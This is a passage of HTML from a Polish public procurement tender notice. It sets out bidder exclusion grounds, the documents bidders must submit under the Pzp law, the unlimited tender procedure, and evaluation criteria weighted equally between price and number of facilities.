zamówienia, zgodnie z art. 36a ust. 2 ustawy P.z.p., zzastrzeżeniem pkt 14.9 SIWZ; 17. Celem wstępnego potwierdzenia spełnieniawarunków, o których mowa w pkt 14 SIWZ oraz w celu wstępnego wykazania brakupodstaw do wykluczenia z postępowania, o których mowa w pkt 16 SIWZ,Zamawiający żąda złożenia: aktualnego na dzień składania ofert lub wniosków odopuszczenie do udziału w postępowaniu oświadczenie dotyczące spełnieniawarunków udziału w postępowaniu, składane na podstawie art. 25a ust. 1 ustawyP.z.p., wg wzoru stanowiącego Załącznik nr 4 do SIWZ; 18. Numery załącznikówdokumentów wymienionych powyżej są zgodne z numeracją wskazaną w SIWZ; 19.W celu umożliwienia porównania ogłoszenia o zamówieniu oraz SIWZ zachowanonumerację poszczególnych elementów z SIWZ.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. W celu wykazania braku podstaw do wykluczenia z postępowania Wykonawca,którego ofertę oceniono jako najkorzystniejszą, na wezwanie Zamawiającegoprzedłoży w terminie 5 dni od dnia wezwania następujące oświadczenia i dokumenty(z zastrzeżeniem oświadczenia, o którym mowa w pkt 17.4.1) SIWZ): 1) oświadczenieo przynależności lub braku przynależności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt 23 ustawy P.z.p., wg wzoru stanowiącego Załącznik nr 7 doSIWZ; a) Wykonawca składa ww. oświadczenie w terminie 3 dni od dniazamieszczenia na stronie internetowej Zamawiającego informacji, o których mowa wart. 86 ust. 5 ustawy P.z.p.; b) Wraz ze złożeniem powyższego oświadczenia,Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą,biorącym udział w tym samym zamówieniu, nie prowadzą do zakłócenia konkurencjiw postępowaniu o udzielenie zamówienia; c) Jeżeli ww. oświadczenie jestniekompletne, zawiera błędy lub budzi wskazane przez Zamawiającego wątpliwości,Zamawiający wezwie do jego złożenia, uzupełnienia lub poprawienia lub doudzielania wyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia,uzupełnienia lub poprawienia lub udzielenia wyjaśnień oferta Wykonawcy podlegaodrzuceniu albo konieczne byłoby unieważnienie postępowania - art. 26 ust. 3 ustawyP.z.p. W przypadku nie przedłożenia przez Wykonawcę ww. oświadczania w ww.terminie Zamawiający wykluczy Wykonawcę z postępowania na podstawie art. 24 ust.1 pkt 12 ustawy P.z.p.; 2) odpisu z właściwego rejestru lub z centralnej ewidencji iinformacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu dorejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawieart. 24 ust. 5 pkt 1 ustawy P.z.p.; a)w przypadku wskazania przez Wykonawcędostępności powyższego dokumentu, w formie elektronicznej pod określonymiadresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiającypobiera samodzielnie z tych baz danych wskazany przez Wykonawcę dokument.Zamawiający może również samodzielnie pobrać dokumenty dostępne w formieelektronicznej pod określonymi adresami internetowymi ogólnodostępnych ibezpłatnych baz danych, nawet jeżeli Wykonawca nie wskaże na możliwość jegopobrania, jeżeli Zamawiający dysponuje wiedzą na temat możliwości samodzielnegopozyskania danego dokumentu; b) samodzielnie pobrane wydruki komputeroweaktualnych informacji o podmiotach wpisanych do Krajowego Rejestru Sądowegooraz zaświadczeń z Centralnej Ewidencji i Informacji o Działalności Gospodarczejposiadają status dokumentu oryginalnego w rozumieniu Rozporządzeniem MinistraRozwoju w sprawie dokumentów, jakich może żądać Zamawiający od Wykonawcyoraz form, w jakich te dokumenty mogą być składane i nie wymagają potwierdzenia zazgodność z oryginałem.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału wpostępowaniu lub kryteriów selekcji Wykonawca, którego ofertę oceniono jakonajkorzystniejszą, na wezwanie Zamawiającego przedłoży w terminie 5 dni od dniawezwania następujące oświadczenia i dokumenty: 1) wykazu narzędzi, wyposażeniazakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonaniazamówienia publicznego wraz z informacją o podstawie do dysponowania tymizasobami, wg wzoru stanowiącego Załącznik nr 6 do SIWZ; 2. Zamawiającydopuszcza złożenie dodatkowych informacji o obiektach, np. dane kontaktowe(telefon, adres www, email), rodzaje usług, uwagi, informacje o ograniczeniach, itp.,jednak ich złożenie nie jest obowiązkowe; 3. Wykonawca może rozszerzyć Wykaz odowolną liczbę obiektów spełniających wymagania Zamawiającego, w celuotrzymania dodatkowych punktów w kryterium ,,Liczba obiektów". Punkty zostanąprzyznane zgodnie z pkt 26.2.2) SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji">Zamawiający nie wymaga składania oświadczeń lub dokumentów w celu wykazania spełnienia kryteriów selekcji.</span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Zamawiający nie wymaga składania oświadczeń lub dokumentów potwierdzającychspełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagańokreślonych przez Zamawiającego.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wykonawca zobowiązany jest do złożenia: 1) Formularza ofertowego,zawierającego m.in. informacje niezbędne do oceny oferty Wykonawcy w ramachpozacenowego kryterium społecznego - wg wzoru stanowiącego Załącznik nr 1 doSIWZ; 2. Oświadczenia i dokumenty, o których mowa w pkt 17.2 - 17.4 SIWZ, będąbadane pod względem formalno-prawnym, pod względem ich aktualności, a także,czy informacje w nich zawarte potwierdzają spełnianie wymagań Zamawiającego wtym zakresie zgodności ze stanem faktycznym, w szczególności w zakresie zgodnościzłożonych oświadczeń lub dokumentów z oświadczeniami składanymi na podstawiepkt 17.1 SIWZ; 3. W przypadku, gdy Wykonawca zamierza powierzyćPodwykonawcy(om) realizację części zamówienia, Zamawiający żąda wskazaniaczęści zamówienia, której wykonanie Wykonawca powierzy Podwykonawcy(om) ipodania przez Wykonawcę nazw (firm) Podwykonawców w treści dokumentu, októrych mowa w pkt 17.2 SIWZ; 4. W przypadku gdy Wykonawca powołuje się nazasoby innych podmiotów, w celu wykazania spełniania warunków udziału wpostępowaniu przez te podmioty dołącza do oferty oświadczenie, o którym mowa wpkt 17.1.1) SIWZ oraz na wezwanie Zamawiającego dla każdego z tych podmiotówzałącza dokumenty w celu potwierdzenia, że ww. podmioty nie podlegają wykluczeniuz postępowania. Wykonawca składa dokumenty i oświadczenia określone w pkt17.4.2) SIWZ dotyczące tych podmiotów; 5. W przypadku gdy Wykonawcazadeklarował powierzenie wykonania części zamówienia Podwykonawcom, w celupotwierdzenia, że ww. podmioty nie podlegają wykluczeniu z postępowania, dołączado oferty oświadczenie, o którym mowa w pkt 17.1.2) SIWZ oraz na wezwanieZamawiającego dla każdego z tych podmiotów załącza dokumenty i oświadczenia wzakresie określonym w pkt 17.4.2) SIWZ dotyczące tych Podwykonawców; 6. Wprzypadku podmiotów występujących wspólnie (Konsorcjum, spółka cywilna) każdy zuczestników musi załączyć do oferty oświadczenie, o którym mowa w pkt 17.1.2)SIWZ oraz na wezwanie Zamawiającego dokumenty określone w pkt 17.4.2) SIWZ.Pozostałe dokumenty i oświadczenia przedkłada ustanowiony Wykonawca -Pełnomocnik jako wspólne; 7. Jeżeli powierzenie Podwykonawcy wykonania częścizamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji,Wykonawca na żądanie Zamawiającego przedstawia oświadczenie, o którym mowa wart. 25a ust. 1 ustawy P.z.p., lub oświadczenia lub dokumenty potwierdzające brakpodstaw wykluczenia wobec tego Podwykonawcy; 8. Jeżeli Zamawiający stwierdzi, żewobec danego Podwykonawcy zachodzą podstawy wykluczenia, Wykonawcaobowiązany jest zastąpić tego Podwykonawcę lub zrezygnować z powierzeniawykonania części zamówienia Podwykonawcy; 9. Powierzenie wykonania częścizamówienia Podwykonawcom nie zwalnia Wykonawcy z odpowiedzialności zanależyte wykonanie tego zamówienia; 10. Jeżeli Zamawiający uzna, iż jest toniezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzieleniezamówienia, Zamawiający może na każdym etapie postępowania wezwaćWykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentówpotwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału wpostępowaniu lub kryteria selekcji, a jeżeli zachodzą uzasadnione podstawy douznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, dozłożenia aktualnych oświadczeń lub dokumentów; 11. Jeżeli Wykonawca nie złożyłoświadczenia, o którym mowa w art. 25a ust. 1 ustawy P.z.p., oświadczeń lubdokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawyP.z.p., lub innych dokumentów niezbędnych do przeprowadzenia postępowania,oświadczenia lub dokumenty są niekompletne, zawierają błędy lub budzą wskazaneprzez Zamawiającego wątpliwości,Zamawiający wzywa do ich złożenia, uzupełnienialub poprawienia lub do udzielania wyjaśnień w terminie przez siebie wskazanym,chyba że mimo ich złożenia, uzupełnienia lub poprawienia lub udzielenia wyjaśnieńoferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnieniepostępowania; 12. Jeżeli Wykonawca nie złożył wymaganych pełnomocnictw albozłożył wadliwe pełnomocnictwa, Zamawiający wzywa do ich złożenia w terminieprzez siebie wskazanym, chyba że mimo ich złożenia oferta Wykonawcy podlegaodrzuceniu albo konieczne byłoby unieważnienie postępowania; 13. Zamawiającywzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnieńdotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawyP.z.p.; 14. Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentówpotwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3, jeżeliZamawiający posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lubmoże je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, wszczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. oinformatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014r. poz. 1114 oraz z 2016 r. poz. 352); 15. Zgodnie z treścią art. 24aa ustawy P.z.p.Zamawiający może, w postępowaniu prowadzonym w trybie przetargunieograniczonego, najpierw dokonać oceny ofert, a następnie zbadać, czy Wykonawca,którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu orazspełnia warunki udziału w postępowaniu. Powyższy przepis stanowi transpozycję dopolskiego porządku prawnego art. 56 ust. 2 Dyrektywy 2014/24/UE, w świetle któregow procedurach otwartych instytucje Zamawiające mogą podjąć decyzję o rozpatrzeniuofert przed sprawdzeniem, że nie ma podstaw wykluczenia, i przed weryfikacjąspełnienia kryteriów kwalifikacji; 16. Procedura, o której mowa w pkt 17.18 SIWZ,polega zatem na tym, że Zamawiający w toku czynności oceny ofert nie dokonujepodmiotowej oceny wszystkich Wykonawców (ocena spełniania warunków udziału wpostępowaniu, braku podstaw do wykluczenia), nie badając nawet wszystkichwstępnych oświadczeń Wykonawców, składanych w szczególności w formieJednolitego Europejskiego Dokumentu Zamówienia. W pierwszej kolejnościZamawiający dokonuje oceny ofert pod kątem przesłanek odrzucenia oferty, o którychmowa w art. 89 ust. 1 ustawy P.z.p. oraz kryteriów oceny ofert opisanych w SIWZ, poczym dopiero wyłącznie w odniesieniu do Wykonawcy, którego oferta zostałaoceniona jako najkorzystniejsza (uplasowała się na najwyższej pozycji rankingowej),dokonuje oceny podmiotowej Wykonawcy, tj. bada oświadczenie wstępne, a następnieżąda przedłożenia dokumentów w trybie art. 26 ust. 1 lub 2 ustawy P.z.p.; 17. Wpostępowaniu prowadzonym zgodnie z zasadami określonymi w art. 24aa (tzw.,,procedura odwrócona")stosownie do treści art. 26 ust. 3 ustawy P.z.p., jeżeliWykonawca nie złożył oświadczenia, o którym mowa w art. 25a ust. 1 ustawy P.z.p.,lub złożone oświadczenie jest niekompletne, zawiera błędy lub budzi wskazane przezZamawiającego wątpliwości, Zamawiający wzywa do złożenia, uzupełnienia lubpoprawienia ww. oświadczenia lub do udzielenia wyjaśnień w terminie przez siebiewskazanym, chyba że mimo jego złożenia, uzupełnienia lub oprawienia lub udzieleniawyjaśnień oferta Wykonawcy podlega odrzuceniu albo konieczne byłobyunieważnienie postępowania; 18. Należy zauważyć, iż w przypadku ,,proceduryodwróconej" wskazany przepis będzie miał zastosowanie w odniesieniu do braku,niekompletności czy błędów dotyczących oświadczenia, o którym mowa art. 25a ust. 1ustawy P.z.p., jedynie do Wykonawcy, którego oferta została oceniona jakonajkorzystniejsza. Tym samym, w sytuacji gdy Wykonawca ten do oferty nie dołączyw/w oświadczenia, bądź też złoży oświadczenie, które jest niekompletne lub zawierabłędy, zamawiający wezwie tego Wykonawcę w trybie przewidzianym w art. 26 ust. 3ustawy P.z.p. do jego uzupełnienia, ale dopiero na etapie, gdy ustali, która z ofert jestnajwyżej oceniona. Powyższe wynika z celu przyświecającego regulacji art. 24aaustawy P.z.p., który to cel sprowadza się do maksymalnego przyspieszeniapostępowania o udzielenie zamówienia publicznego; 19. Numery załącznikówdokumentów wymienionych powyżej są zgodne z numeracją wskazaną w SIWZ; 20.W celu umożliwienia porównania Ogłoszenia o zamówieniu oraz SIWZ, zachowanonumerację poszczególnych elementów z SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>50,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Liczba obiektów</TD><TD style='border: 1px solid black;border-collapse: collapse;'>50,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span 